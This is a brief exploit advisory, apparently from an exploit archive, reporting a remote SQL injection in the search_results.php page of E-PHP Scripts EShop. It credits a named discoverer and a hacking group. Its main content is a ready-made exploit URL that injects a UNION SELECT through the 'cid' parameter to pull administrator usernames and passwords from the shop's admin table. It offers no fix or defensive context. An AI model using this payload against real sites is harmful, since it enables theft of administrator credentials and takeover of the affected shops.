E-PHP Scripts EShop suffers from a remote SQL injection vulnerability in search_results.php.
d40a6acc470ec79dd101a042cd4aaa86affba51806cc25a180e3a5fadc7c1b24
E-Php Scripts Eshop 'search_results.php' SQL Injection Vulnerability
#############################################
Dicovered By: SaiedHacker
Group: HackeranShiraz Security Team
Web Address: www.HackeranShiraz.Com
E-mail: SaiedHackerIran@Yahoo.com
#############################################
Exploit:
http://Target/eshop/search_results.php?cid=-10%20union%20select%200,concat(es_admin_name,0x3a,es_pwd),2,3,4,5%20from%20eshp_admin